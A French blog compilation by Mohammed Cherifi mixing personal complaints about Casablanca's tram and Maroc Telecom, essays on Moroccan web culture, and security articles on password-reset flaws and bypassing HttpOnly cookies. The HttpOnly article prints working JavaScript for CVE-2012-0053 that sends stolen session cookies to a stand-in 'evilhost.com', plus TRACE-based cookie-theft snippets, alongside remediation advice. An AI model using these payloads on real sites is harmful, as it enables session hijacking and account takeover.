Mohammed CHERIFI

Tweet

C’est presque devenu une habitude quand le citoyen lambda paie les erreurs de l’incompétence des gens qui – normalement – doivent veiller à lui rendre la vie facile. Je vous raconterai une petite histoire qui s’est passée dans une station de Tramway à Casablanca : Comme monsieur tout le monde je me dirige vers le distributeur de tickets, je paie et je récupère mon ticket pour aller à Casa Voyageur. Jusqu’ici tout est normale, je valide mon ticket à l’entrée de la station et là ça ne passe pas ! Je demande donc à l’agent de sécurité s’il y a un problème au niveau de l’appareil, ce dernier me dit que le ticket ne fonctionne pas et qu’il faut aller faire une réclamation à l’agence. Il est déjà presque 20h00, je lui demande donc si ça va poser problème si je monte avec dans le tram, il a dit «non», et il m’a quand même laissé passer. Ok par-contre il se trouve que je ne suis pas dans la bonne voie, il faut que je sors de la station pour aller de l’autre coté.

A l’autre coté il y a un autre agent de sécurité à qui j’ai expliqué que le billet que je viens d’acheter du distributeur est défectueux, et que son collègue m’a laissé passer. Ce dernier n’a pas été du même avis, il m’a montré un écrit où il y a des consignes officielles indiquant qu’il est interdit pour eux de laisser passer un voyageur avec un billet défectueux et qu’il faut leur demander d’aller réclamer dans l’agence la plus proche! Incroyable mais vrai, j’ai dit au monsieur que je ne peux pas acheter un autre billet parce-que ce n’est pas de ma faute si le distributeur/validateur de tickets ne fonctionne pas, faut bien trouver une solution parce-que j’ai préféré le tram par soucis d’efficacité, c’est plus rapide vu la circulation à Casa! Là, un monsieur me dit : si t’en a pas on peut cotiser 7DH pour t’acheter un billet, et c’est là que je me met en colère en lui expliquant qu’il ne s’agit pas d’argent, je peux m’en acheter plusieurs mais je n’accepte pas de payer l’erreur de celui qui a produit des distributeurs qui ne fonctionnent pas. A un certain moment j’ai arrêté puisque le mec ne fait que son travail et qu’il n’y peut rien à part recommander aux gens de prendre le reçu (que je n’ai pas pris) pour pouvoir récupérer un autre billet de l’agence après réclamation.

Je me suis redirigé – malgré moi – vers un autre distributeur de billet, et je n’avais pas de pièces, que des billets, j’étais obligé de chercher la monnaie dans un café puisque les distributeurs n’acceptent que des pièces.. J’ai acheté un autre billet et cette fois-ci j’ai aussi imprimé le reçu (on sait jamais). En le faisant, j’avais le doute que ça se reproduit, une frustration payante – peut importe le coût – mais inédite dans son genre, cette fois-ci le billet fonctionne.

Je monte dans le tram en pensant au nombre de personnes qui ont vécu plus ou moins la même expérience, à ceux qui n’ont en poche que 7DH pour acheter un billet défectueux et qui seront obligés d’aller réclamer à l’agence la plus proche. Ah ! et s’ils n’impriment pas le reçu ils sont foutus, sans ce dernier on ne peut pas réclamer selon l’agent de sécurité.

Le tramway de Casablanca a pour objectif d’alléger la circulation et de faire gagner un temps considérable au gens. Ce genre d’incident est un flagrant signe d’incompétence et de non considération aux voyageurs, Que dirai un étranger du Maroc si ça lui arrive un truc pareil hein? Les erreurs techniques ça arrivent, la moindre des choses c’est de trouver une solution qui permet aux voyageurs d’opter pour le tram sans pour autant se prendre la tête. Interdire à l’agent de sécurité de laisser passer des gens ayant eu le même problème que moi est peut être justifié par la méfiance des agences vis à vis les mauvaises pratiques connues. Mais n’empêche de leur donner moyen – au moins – de vérifier la date du billet pour l’approuver ou pas en attentant que le problème soit résolu. Une telle interdiction pour quelqu’un qui a payé son billet c’est de l’humiliation et un manque de respect vis à vis le citoyen marocain.

En attendant que ça soit résolu, j’espère que la société qui gère le tramway Casa trouve une formule plus équitable parce-que celle-ci nuit gravement à son image. personnellement je n’ai jamais vécu une telle expérience à Rabat et je n’ai aucune envie de la revivre à Casablanca puisque je m’y suis installé définitivement.

Tweet

Si on croit bien les chiffres du ministère de l’éducation nationale, 30% de la population marocaine âgée de plus de 10 ans ne sait pas lire ou écrire, c’est moche d’être dépendant de “ceux qui savent”, ceux qui liront à votre place, ceux qui écriront à votre place, ceux qui signeront à votre place. Cette dépendance chez « les gens qui ne savent pas » est chronique mais réparable..

Quant à ces « gens qui savent », seuls 49% se connectent sur Intenet. Le réseau social Facebook demeure l’un des sites les plus visités au Maroc, suivi de Youtube, Google, Hespress et Kooora, un classement qui laisse penser qu’Internet pour les marocains est plus un outil de divertissement qu’un outil d’apprentissage, une réalité qu’on ne peut pas nier, et qui donne naissance à une nouvelle génération émergente d’analphabètes. Cette génération sait lire, écrire (avec plein de fautes), compter, mais elle reste en grande majorité “illettrée”, c’est la cause principale de l’e-misère que vit la web-sphère marocaine, moi je les appelle les e-analphabètes, ils souffrent d’e-analphabétisme, et ont une attitude remarquable:

L’attitude de l’e-analphabète:

Un e-analphabète ne sait pas ce que c’est la e-réputation, la confidentialité pour lui est une blague, son mur est ouvert au grand public, il s’inscrit partout et sa boite email est inondée de courriers indésirables, il partage tout ce qui lui semble intéressant (ou pas), choquant, drôle surtout. Il entend parler de Twitter, s’y inscrit et commence à tweeter plus rapidement que son ombre, ça lui arrive souvent de dire des gros mots, Son ordinateur est toujours plus lent qu’une tortue tellement il l’étouffe d’applications, et à chaque fois que sa connexion devient lente il pense que c’est à cause des virus..

Un e-analphabète n’est jamais content, il saute sur toutes les causes et critique tout ce qui bouge, on peut d’ailleurs distinguer plusieurs niveaux d’e-analphabétisme:

• Niveau 1 : Il a un pc, il connait seulement Internet Explorer, Paint, Solitaire et Kooora.com et passe la majorité de son e-temps sur leur forum
• Niveau 2 : C’est le niveau 1 en plus de Facebook, il passe tout son temps à gossiper et collectionner des belles filles, Facebook lui bloque son compte, il attend quelques jours et recommence.. à perpétuité.
• Niveau 3 : C’est le niveau 2 en plus des moyens de distractions (jeux vidéos, streaming, et films porno).
• Niveau 4 : Utilise son pc juste pour le boulot, les emails professionnels et word/excel.
• Niveau 5 : Il a entendu parlé de Twitter, il ne l’a pas compris, mais il tweete plus rapidement que son ombre pour se faire un maximum de followers.

Cette liste n’est pas exhaustive, mais voici des phénomènes qui reflètent la croissance du taux d’e-analphabétisme au Maroc:

La e-connerie des réseaux sociaux:

Tu veux être mon ami?
Commençant par l’ajout à la liste d’amis sur Facebook, il est tout à fait normal que tu reçois une invitation d’ajout d’une personne que tu ne connais pas, et qui ne prend pas la peine de t’envoyer un message expliquant la raison de son ajout. Tu ne comprends pas! Tu décides alors d’activer les abonnements à ton compte mais en vain, tu continues à en recevoir..

L’e-amitié de Facebook est un concept complétement corrompu, c’est inutile de faire le rapprochement avec la vraie amitié, merci de n’ajouter que ceux que vous connaissez déjà.

Les fausses causes et les gens révolutionnaires
Les événements qu’a vécu la région MENA et la signification qui se donne actuellement à la révolution est mal interprétée, cela nuit gravement au concept de ce droit. Déguiser une cause qui manque d’objectivité au nom de l’islam, aussi débile qu’elle soit, est le meilleur moyen pour que des milliers de personnes y adhérent sans modération, je cite par exemple l’appel demandant à boycotter Google et Youtube pour avoir refuser de supprimer les vidéos anti-islam. résultat: un rassemblement pour une bonne cause, qui se transforme en charabia, et risque d’avoir des répercussions majeures sur la stabilité de la région.

L’utilisation des réseaux sociaux a vachement augmenté à partir du moment où les gens ont commencé à lire et entendre dire que tout a commencé sur Internet. C’est là que les marocains se sont un peu rendu compte qu’Internet pouvait servir à quelque chose ( comme l’UECSE ) par exemple. Mais l’e-analphabétisme dans le volet du printemps arabe c’est la naïveté des utilisateurs, et du coup les réseaux sociaux ont pris une dimension qui n’est pas la leur, et surtout une dimension qu’ils ne peuvent pas assumer. Tout le monde a commencé à penser et à croire qu’on pouvait faire la révolution sur Facebook et Twitter, du coup la révolution RESTE sur FB et Twitter et aboutit rarement à la réalité qu’est la rue.

En réalité pour les marocains Facebook n’est pas un réseau social, le cas du maroc est unique, facebook a muté. Une mutation qui a affecté la société marocaine: Aujourd’hui l’amitié n’est plus la même, la vie du couple n’est plus la même, la connerie n’est plus la même, la société marocaine s’est métamorphosée, elle a adapté facebook à son propre mode de vie. Un mode de vie qui nous ouvre les yeux sur le mauvais usage qu’on pratique au quotidien sur les réseaux sociaux.

Les tweets massifs et la course aux followers:
L’e-analphabétisme est flagrant sur Twitter. Les gens ne semblent pas comprendre que les 140 caractères sont faits pour être bref et relayer une information. On dirait que Twitter au Maroc est une sorte de mIRC des temps modernes, une TL, et une room de chat qui s’appelle #twittoma, un café à la marocaine où les égos se pavanent. Et c’est la course aux followers aussi.

Dans la #twittoma d’aujourd’hui: la quantité au dépourvu de la qualité, des twittos qui ont plus de 6000 followers et qui twittent de façon immature, plus rapidement que leur ombre, et des twittos respectables, et au contenu vraiment intéressant, mais qui n’arrivent même pas aux 500 followers parce que; bon « ils ne sont pas populaires ».

La course à la popularité pousse les gens à faire des choses qui sont totalement folles.

F**k me i’m e-Famous
Un phénomène très spécial qui devient de plus en plus flagrant, ce sont les personnes qui créent des pages portant leur nom: « Bogoss XYZ Officiel », « Bogossa JMKHEUQXQF original », mais ces gens n’ont pas conscience que le net est public? beaucoup des facebookeurs marocains sont des fanatiques de gossiping, ils n’hésitent pas à faire leur conquérant du web en choisissant de voler des photos et insulter toute personne qu’ils jugent contraire à leur morale et à leur pseudo code.

Les arabisants et le mépris des langues étrangères:

L’expérience a prouvé que la majorité des marocains préfèrent lire les news en arabe, Hespress en est la preuve vivante, d’ailleurs des vieux portails comme Menara l’ont compris et ont fait de l’arabe la langue principale de leur nouvelle version.

Ce que je ne comprends pas, c’est pourquoi les gens méprisent les langues étrangères? Est-ce le fait de croire que nos valeurs sont universelles? Pourquoi à chaque fois que je vois une émission, au lieu de commenter le sujet les gens commentent l’usage des langues étrangères? Se contenter d’un seul langage, n’est-ce pas limiter ses connaissances et son ouverture d’esprit?.

Que ce soit l’anglais ou le français ou bien l’espagnol, l’apprentissage d’une nouvelle langue est la meilleure façon pour découvrir une nouvelle culture et voir le monde d’un nouvel œil sans avoir recours à la traduction!

Et la e-civilisation?

Dans un e-pays, il y a un e-gouvernement et des e-citoyens…tous œuvrent pour le bien commun de la e-communauté (ou presque). Ils ont adopté une e-démocratie où les e-citoyens élisent leurs e-représentants selon les dispositions légales définie par une e-constitution. L’économie de cette e-nation est basée sur le e-troc et le e-marché…celui qui enfreint à la loi de la e-communauté est traduit devant la e-justice qui, dans les cas extrêmes, peut le condamner à la peine capitale: « le bannissement de la e-communauté »!!

La e-société marocaine est une projection de la vraie société marocaine, les e-analphabètes ont aussi besoin d’un programme de lutte contre l’e-analphabétisme, c’est à cause d’eux qu’on a des portails (pour ne pas dire presse électronique) qui publient des futilités et fausses rumeurs, des internautes qui la diffusent sans vérifier, et bienvenue la désinformation..

Mes co-e-citoyens, êtes-vous prêts pour tenter l’aventure de la e-civilisation?

Tweet

Chaque e-service ayant un espace privé dispose généralement d’une section permettant aux utilisateurs ayant oublié leur mot de passe de le récupérer ou le changer, l’approche diffère d’un fournisseur de service à un autre, chaque approche se base sur un processus de récupération qui se déroule généralement sur plusieurs étapes, à travers chaque étape l’utilisateur doit fournir des informations permettant de confirmer son identité, ainsi la validation de toutes les étapes garantie à l’utilisateur un accès à son compte.

Par-contre que se passerai-t’il si l’une des étapes est contournée? les informations sur-lesquelles s’appuient les processus de récupération sont-elles fiables? Quelles sont les bonnes pratiques? C’est les questions auxquelles je vais essayer de répondre dans cet article.

« J’ai oublié mon mot de passe » est une nécessité

Combien de fois avez-vous réinitialisé votre mot de passe sur un service? avouez-le c’est embêtant d’oublier les informations de récupération (question secrète/email secondaire etc..), par-contre c’est rassurant le fait de regagner accès à son compte après avoir oublié ses identifiants n’est ce pas?

Évidement la fonction de récupération de son compte est une fonctionnalité vitale, le nombre des e-services se multiplie et aujourd’hui chaque internaute dispose d’une multitude de comptes sur plusieurs e-services. Il devient de plus en plus difficile de se rappeler de tous ses mots de passe sur chaque service, l’Auth2.0 a vu le jour pour résoudre cette problématique mais la tendance sur les nouveaux e-services est de demander à l’utilisateur de créer un mot de passe même s’il s’inscrit par le billet d’une Auth2.0 tel que Twitter et Facebook.

Récupérer ou réinitialiser?

La récupération consiste à envoyer par e-mail à l’utilisateur son ancien mot de passe ou de générer un nouveau mot de passe temporaire, cette approche fait partie des mauvaises pratiques. Si la logique de régénération est faillible, un attaquant peut mener une attaque de bruteforce pour gagner l’accès au compte utilisateur.

Aujourd’hui l’approche la plus adoptée par les géants d’internet c’est la génération d’un jeton, qui à travers un lien hypertexte unique permet de réinitialiser le mot de passe de l’utilisateur, le lien hypertexte est envoyé à l’adresse e-mail de secours de ce dernier, ainsi le service demande à l’utilisateur en échange de saisir les informations précédemment remplies le jour de l’inscription et principalement la question secrète ou l’adresse e-mail alternative, dans le cas contraire sur certains services de messagerie, l’utilisateur peut fournir des informations relatives à son compte comme les derniers échanges (sujets/emails/dossiers etc..), si les informations correspondent l’utilisateur reçoit un mail avec un lien de réinitialisation de son mot de passe, ces informations pouvant être facilement récupérées grâce au social engineering, c’est pourquoi des géants comme Google et Facebook ont rajouté la double vérification ou la vérification téléphonique, qui à ce jour, si on ne considère pas le grand budget dépensé pour les notifications et la vie privée des utilisateurs, reste la solution la plus efficace.

Les erreurs fatales:

• Vérification insuffisante des paramètres de requêtes HTTP :
  Ces derniers mois des géants comme Google et Microsoft ont connu une vague de piratage des comptes utilisateurs dû au contournement des étapes de réinitialisation de mot de passe, la technique utilisée par les pirates consiste à bidouiller, avec des outils comme l’extension Firefox TamperData, les paramètres HTTP POST, ne vérifiant pas la validité des données postées le processus de réinitialisation renvoie l’attaquant sur la page de modification.
• Référence à un objet non-sécurisé dans l’algorithme de génération du jeton (token) : cette faille et exploitable quand l’algorithme de régénération du jeton (token) de réinitialisation fait référence à un objet non sécurisé comme la date (timestamp) ou encore le nom d’utilisateur, par exemple avec le timestamp un attaquant peut en exerçant du reverse engineering régénérer un token et le reproduire pour avoir un lien de réinitialisation valide (Randomness Attack)
• Attaque CSRF sur la page de modification des informations de récupération:
  Pour comprendre ce genre d’attaque, on considère un REGISTRAR qui dispose d’un processus de réinitialisation de mot de passe fiable, l’utilisateur renseigne son adresse email de secours et il reçoit un lien de réinitialisation, dans son espace membre il y a un lien qui lui permet de modifier les informations de récupération de mot de passe tel que la question secrète ou l’adresse e-mail alternative. Si le formulaire en question est vulnérable aux attaques CSRF un attaquant peut facilement modifier les informations de récupération rien qu’en lui amenant à cliquer sur un lien pendant qu’il est connecté à son compte, pour mieux comprendre la faille Cross Site Request Forgery rendez-vous sur cet article.
• profils publics et confidentialité
  Contrairement à ce que vous pensez, vos profils publics en disent beaucoup sur vous, vos likes par exemple peuvent aider un attaquant à deviner la réponse à votre question secrète, il faut donc être vigilant dans le choix de ses réponses secrètes.

Les bonnes pratiques:

• Pour les développeurs:
  • Sécuriser l’espace membre contre les attaques CSRF
  • Ne pas baser l’algorithme de réinitialisation de jeton sur une référence à un objet non sécurisé
  • Ne pas mettre des questions secrètes débiles comme: « Nom de votre jeune sœur » ou encore « le nom de votre chien », avec les réseaux sociaux ce genre d’informations est facilement trouvable.
• Pour l’utilisateur:
  • Jamais le même mot de passe! : certains services stockent les mots de passes en texte brute sur leur bases de données, ces mots de passes n’étant pas cryptés.. avoir le même mot de passe sur plusieurs services n’est pas avantageux, pensez à mettre un mot de passe différent pour chaque service!
  • Ne communiquez jamais vos informations personnelles à un inconnu, n’acceptez pas sur Facebook ceux que vous connaissez pas, collecter des informations sur vous peut aider un attaquant à deviner la réponse à votre question secrète
  • Vous avez changé votre mot de passe et aussi les informations de récupération, c’est bien! par-contre si le e-service est basé sur l’Auth2.0 il faut penser à jeter un œil sur les applications ayant toujours accès à vos données, le changement de mot de passe n’impacte pas l’accès aux données personnelles à partir des applications tierces autorisées

Tweet

Tout internaute de la communauté marocaine connait GeekFtour, un événement unique qui s’organise chaque Ramadan et qui réuni les technophiles marocains, cet événement a vu le jour grâce à l’initiative de notre cher ami Moncif Aissaoui, qui en 2010 a eu l’ingénieuse idée d’organiser un ftour collectif pour réunir la communauté #twittoma et #bloghoma autour d’une table, l’événement a eu une forte présence au point d’obliger les organisateurs de répartir les invités sur deux endroits, l’endroit initialement prévu n’a pas suffit pour accueillir tout le monde. C’était donc un véritable succès d’un concept original qui a séduit l’opérateur telecom INWI, qui depuis la deuxième édition, est devenu le sponsor officiel de cette manifestation.

Les nouveautés de GeekFtour 2012

Pour cette édition, Evento enrichit le concept avec trois nouveautés majeurs: Encore plus de monde, Ramadan Gaming et Ignite GeekFtour:

• La participation à l’événement restera gratuite et accueillera cette année 400 personnes
• Ramadan Gaming, ou tout simplement un concours de jeux vidéos pour les gamers qui va commencer 3heures avant le ftour, une trentaine de Gamers s’affronteront et les gagnants partiront avec des prix à la fin de l’événement
• Ignite GeekFtour: une série de conférences, de 5 minutes chacune, avec 20 secondes par slide, un exercice oral auquel 10 personnes se prêteront pour parler d’une thématique de leur choix, si vous ne connaissez pas le concept d’Ignite je vous invite à visiter le site web Ignite Maroc pour avoir une idée

Si n’avez pas encore réservé votre invitation, c’est par ici

Ce que j’attends de la communauté

Si on ne compte pas Maroc Web Awards, #GeekFtour est la seule manifestation majeure qui réuni la communauté web marocaine, cette chance est donc offerte deux fois par an et il faut en tirer un maximum et consolider les efforts de la communauté pour initier de nouveaux projet et surtout pour enrichir la scène web-sphère marocaine.

SI vous considérez cet événement comme une simple rencontre de geeks alors vous vous trompez, ça a toujours été un plaisir de se rencontrer et se prendre en photo, mais sachez qu’une bonne partie des participants sont la pour des opportunités d’affaires, pour recruter ou tout simplement pour du réseautage, soyez donc interactifs, n’ayez pas peur de vous présenter et montrer ce que vous savez faire, il y a de forte chance que vous trouvez des partenaires qui partagent les mêmes ambitions et qui ont besoin de vous!

En quelques mots: Je veux un échange efficace, inutile de se répartir en clans, et comme le dit toujours Rachid Jankari : إلى الأمام et rendez-vous samedi 11 août 2012 à 17:00 au Sofitel Casablanca Tour Blanche

Tweet

Avant d’entrer dans le vif du sujet, il est important de faire la différence entre un simple Cookie, et un HttpCookie car il s’agit de deux notions complétement différentes, un Cookie représente des données envoyés par un serveur web et stocké dans un fichier texte par le biais d’un navigateur web, il peut être aussi manipulé avec du code Javascript ou des entêtes HTTP contenus dans les réponses en provenance d’un serveur WEB.

Un cookie HttpOnly ou HttpCookie a la particularité d’être accessible seulement via HTTP(s), l’accès à cet élément est restreins à tous les non HTTP-APIs comme JavaScript. Les cookies HTTPOnly sont généralement utilisés pour conserver les informations d’authentification afin de protéger ces dernières contre les attaques XSS, cet article a pour but de vous montrer comment est ce possible de contourner cette protection, et aussi comment remédier à ce genre d’attaque.

Notions de bases

Syntaxe

Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]

Exemple 1:

Set-Cookie: wordpress_f8bee1a788233546681a64908c37c3a0=admin|134982|876946033fb3e2e16f2810d55945ddb4ce29; Expires=Wed, 09 Jun 2021 10:18:14 GMT; domain=www.mcherifi.org; path=/; Secure

Si on exécute le code

<script>alert(document.cookie)</script>

Le résultat affichera :

wordpress_f8bee1a788233546681a64908c37c3a0=admin|134982|876946033fb3e2e16f2810d55945ddb4ce29;

Exemple 2

Set-Cookie: wordpress_f8bee1a788233546681a64908c37c3a0=admin|134982|876946033fb3e2e16f2810d55945ddb4ce29; Expires=Wed, 09 Jun 2021 10:18:14 GMT; domain=www.mcherifi.org; path=/; Secure; HttpOnly

Maintenant si on ré-exécute le code

<script>alert(document.cookie)</script>

Le résultat sera une boite de dialogue affichant un message vide, en effet le flag HttpOnly rend les cookies inaccessibles par JavaScript. toute-fois, il est possible dans certains cas de contourner cette protection et extraire le contenu de ces cookies.

Apache httpOnly Cookie Disclosure (CVE: 2012-0053)

Les versions d’Apache entre 2.2.x et 2.2.21 sont vulnérables, en effet lorsqu’on envoie une requête HTTP mal formée, Apache retourne en en réponse un message d’erreur 400 (Bad Request), pour le bonheur des hackers, cette réponse contient les entêtes HTTP y compris les cookies ayant le flag HttpOnly.

La méthode la plus simple consiste à envoyer une requête avec une entête volumineuse qui dépasse la longueur autorisée par Apache:

// Set cookies
//
    for (i = 0; i < 10; i++) {
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }

En revisitant le site en question, on verra bien une page d’erreur 400 (Bad Request) avec le contenu de tous les cookies, il suffit d’un bout de code javascript pour « parser » cette réponse et récupérer les informations, puis les envoyer à un serveur (comme dans le bon vieux temps), ci-dessous un exemple:

function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            img = new Image();
            img.src= "http://evilhost.com/getcookie.php?c="+escape((JSON.stringify(cookie_dict)));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);

Et voilà le tour est joué, pour information, Twitter et d’autres géant utilisant Apache2 (ou l’une de ses variantes) étaient affectés par ce bug et l’ont corrigé récemment!

FireFox 8 et le plugin Java 7u1

Les navigateurs aussi n’ont pas échappé à cette problématique, cette fois-ci Firefox avec le plugins Java 7u1 qui ne filtre vérifie pas le flag httpOnly avant d’afficher le contenu des entêtes HTTP, ci-dessous une vidéo illustrant son exploitation.

La méthode HTTP Trace

TRACE’ est méthode pour envoyer des requetes HTTP, elle permet d’afficher en retour la réponse du serveur en plus de la requête envoyée initialement par l’utilisateur. Le risque réside dans le fait que la réponse contient également les entêtes HTTP (évidement avec les cookies HttpOnly), comme dans l’exemple précédant, il est possible d’utiliser du javascript ou un plugins (Java/Flash) pour exploiter cette faille, voici quelques exemples:

XMLHttpRequest (IE 6) et anciens navigateurs

function trace()
{

    var http_request = false;
    if (window.XMLHttpRequest)
        http_request = new XMLHttpRequest(); //Tout sauf IE else if (window.ActiveXObject)
        try {
            http_request = new ActiveXObject("Msxml2.XMLHTTP"); //IE > 6 } catch (e) {
            try {
                http_request = new ActiveXObject("Microsoft.XMLHTTP"); //IE <= 6 } catch (e) {} }
    if (http_request) {
        http_request.open("TRACE","/",false);
        http_request.send();
        alert(http_request.responseText); }

} 

Opera 9.64

function javacon(url)
{
 javaurl = new java.net.URL(url);
 conn = javaurl.openConnection();
 conn.setRequestMethod('TRACE');
 var response = '';
 input = conn.getInputStream();
 var lnr = new java.io.LineNumberReader(new java.io.InputStreamReader(input));
 while ((n = lnr.readLine()) != null) response += n + '\n ';
 return response;
}
 
alert(javacon(location.href));

Safari 4.0.3, en utilisant un applet Java

RequestProperty.java

import java.applet.*;
import java.net.*;
import java.io.*;

public class RequestProperty extends Applet 
{
 public void start() 
 {
  try {
       URL url = getCodeBase();
       HttpURLConnection conn = (HttpURLConnection) url.openConnection();
       InputStream inp;
       try {
            conn.getInputStream();    // method GET
           }
       catch (IOException ee)
           {
            conn.getErrorStream();
           }
       String cookie = conn.getRequestProperty("Cookie");
       getAppletContext().showDocument(new URL("javascript:alert('"+cookie+"');"));
      }
  catch (Exception e){}
 }
}
<applet code=RequestProperty.class width=1 height=1></applet>

Pourquoi c’est dangereux?

La faille en question (CVE: 2012-0053) permet de ré-exploiter les XSS pour d’obtenir les sessions authentification mais aussi en la combinant avec d’autres vecteurs d’attaques (XSRF, ClickJacking) l’attaquant peut pousser son attaque à un très haut niveau, Abysssec Security Research ont déjà réussi à exploiter les fonctionnalités d’administrateurs sur WordPress en combinant ClickJacking+CVE: 2012-0053, démo et vidéo dans cet article

Comment y remédier?

L’échange des cookies httpOnly se fait à plusieurs niveaux (navigateurs, serveurs web, réseaux), Il est clair qu’une sécurité totale n’existe pas, toute-fois il faut penser à prendre un minimum de mesures pour y remédier:

• Coté Client: Mettez à jour vos navigateurs régulièrement ainsi que les plugins tiers (Java/Flash/etc..)
• Coté Serveur: Mettre à jour son serveur apache à une version >= 2.2.22
• Ne pas hésiter à implémenter CSP dans ses sites
• Si la méthode TRACE est activée au niveau de votre serveur WEB, pensez à la désactiver, vous pouvez aussi le faire via un .htaccess:
  

  RewriteEngine On
  RewriteCond %{REQUEST_METHOD} ^TRACE
  RewriteRule .* – [F] » – www.yoursite.com

Voilà, cette liste n’est donc pas exhaustive, n’hésitez pas à partager vos méthodes pour outrepasser HttpOnly ;)

Tweet

Tout a commencé en début Avril 2012, ce jour là, Maroc Télécom double les débits sur toutes les lignes ADSL ainsi le débit entrée de gamme devient 4M.

Les clients de l’opérateur historique ont accueilli la nouvelle avec le sourire, et effectivement, un jour plus-tard, on a remarqué un changement considérable: Une énorme dégradation de la qualité des connexions ADSL et 3G qui a duré
3 semaines. La grande majorité des clients n’étant pas satisfaits du service, un
ipmortant nombre de collectifs s’est formé pour protester contre le
problème de débit et la censure de certains services VOIP, et c’est à ce moment là que Maroc Telecom communique, un jour plus-tard, sur la source du problème et promet de le résoudre avant le 8 Avril dans un autre communiqué, chose faite et les débits sont revenus finalement à la normale.

Voilà, ceci est donc la version 1.0 de l’histoire.

Sauf que..

Quelques jours avant, une limitation au niveau de la bande passante a été imposée à tous les clients de l’offre 3G Mobile sans abonnement. Avant , l’Internet prépayé sans abonnement était facturée par rapport aux nombre de jours. Aujourd’hui ce n’est plus le cas. En effet , en fonction du montant de la recharge, le client ne peut pas dépasser un quota de bande passante qui est à partir de 100Mo pour une recharge de 10 DH valable 24h.Dès que ce quota est dépassé , la connexion est coupée ! Et vous savez que ce n’est même pas suffisant pour voir 3 vidéos Youtube qui ont chacune une durée de 5minutes..

Admirez ci-dessous les tarifs compétitifs de la nouvelle offre 3G sans abonnement:

Une version 2.0 de l’histoire

A mon avis, il ne s’agissait peut être pas d’une histoire de câble. Il faut être débile pour croire que le problème provient effectivement de la liaison sous-marine du câble Atlas Offshore. D’ailleurs, des médias numériques ont indiqué que le câble ne souffre pratiquement d’aucun problème de connectivité. OK mais la question qui se pose est : si ce n’est pas à cause du câble.. qu’est ce que ça peut être alors?

Si on suit pertinemment l’enchainement des événements, on remarque que la dégradation de débit est apparue juste après le changement de ces derniers pour les clients des offres ADSL . De ce fait le trafic consommé a doublé et la charge sur les liaison est devenue très importante. Je suppose que Maroc Telecom ne s’attendait pas à une charge si forte ni à avoir des milliers de clients mécontents de la qualité de service . Il fallait donc les calmer le temps de trouver une solution..

Deux semaine plus tard, BINGO solution trouvée!

On fais quoi? Les utilisateurs d’internet 3G abusent, Si on limite la bande passante comme le font certains opérateurs en France la charge sera allégée et nos liaisons peuvent supporter le trafic! Un choix difficile mais nécessaire..

Je peux avoir tord sur ce point là, mais si vous avez bien suivit le timing, vos connexions se sont rétablies juste après ce changement là. C’est à dire depuis que l’accès à l’internet 3G sur les offres prépayées est devenu plafonné en fonction des unités :)

Et donc problème résolu? Partiellement Oui, mais les clients 3G sont toujours furieux au point que certains ont même cassé leurs cartes SIM et modems. Si seulement ils savaient qu’il pouvaient les flasher avec le firmware officiel pour pouvoir faire marcher d’autres puces 3G avec..

Et l’ANRT dans tout ça?

Je peux vous dire sans exagération que l’ANRT a reçu des centaines de réclamations de clients mécontent de Maroc Telecom (j’en ai envoyé une moi même) . Ces derniers voulaient qu’on les indemnise, ils réclament le remboursement du mois de Mars par Maroc Télécoms et une communication régulière sur les changements d’offres deux mois à l’avance minimum, chose qui est tout à fait légitime.

Et bien-sur au lieu d’être à l’écoute et, théoriquement, du coté du consommateur pour le protéger, cette dernière a décidé de « réglementer » l’usage d’internet 3G et d’imposer la limitation à tous les autres fournisseurs d’accès internet 3G en les obligeant à prendre les mêmes mesures pour s’aligner avec la nouvelle offre de l’opérateur historique :), et si vous lisez la première phrase de cece communiqué ça vous laissera réfléchir un peu sur de cette histoire…

Conclusion

Maroc Telecom est une société cotée en bourse qui a tiré de grandes marges de bénéfices au cours de la dernière décennie . C’est bien entendu grâce à nous clients passifs, qui ne savons pas défendre nos intérêts et imposer un
minimum de respect vis à vis de nos prestataires. Je pense que c’est le moment de créer une association pour protéger les utilisateurs d’internet contre ce genre d’abus, et comme l’a si bien dit Reda Allali du groupe Hoba Hoba « Notre passivité n’est pas illimitée! ».

A méditer :)

Tweet

Klout est un outil de mesure de l’influence en ligne. Il mesure généralement l’influence numérique et l’engagement des individus, des célébrités et marques sur un score de 1 à 100 en fonction de plusieurs paramètres tels que le ratio Twitter Followers/Following et retweets, les « shares », les commentaires de Facebook et les « J’aime »s etc….

Klout a pour objectif de standariser le principe d’e-influence, en créant des profiles basés sur les informations collectées depuis les réseaux sociaux tels que Facebook, Twitter, Google+, Foursquare et autres. ces mêmes informations sont exploitées pour générer le profil Klout de l’internaute.

Tout ça c’est bien, cependant Klout n’est pas aussi efficace qu’on le crois et reste contournable, voici quelques raisons:

Pour Klout, une grande gueule est une personne influente:

Ceci-dis, Klout est plus quantitatif que qualitatif, le calcul du score s’appuie plus sur la mesure de l’activité/réactivité sur les réseaux sociaux que sur la mesure de la réelle influence.

Lors d’une étude menée par l’agence RAAK (spécialisée en Social Media) , les résultat ont démontré qu’à partir d’un bot complétement anonyme, sans avatar, qui ne follow personne, et qui tweet toutes les minutes, le score Klout atteint 51/100

Selon Klout: « Je suis community manager.. donc je suis influent »

Klout offre aux utilisateurs la possibilité de connecter leur page facebook à leur compte Klout, le nombre de tous les fans de la page en question sera rajouté à l’audience réelle du score Klout (Le True Reach), et naturellement le score explose pour atteindre les environs de 60~70 si la page a une audience de 45k fans.

Cette approche est totalement fausse car Le « True Reach » concerne seulement les amis/followers.

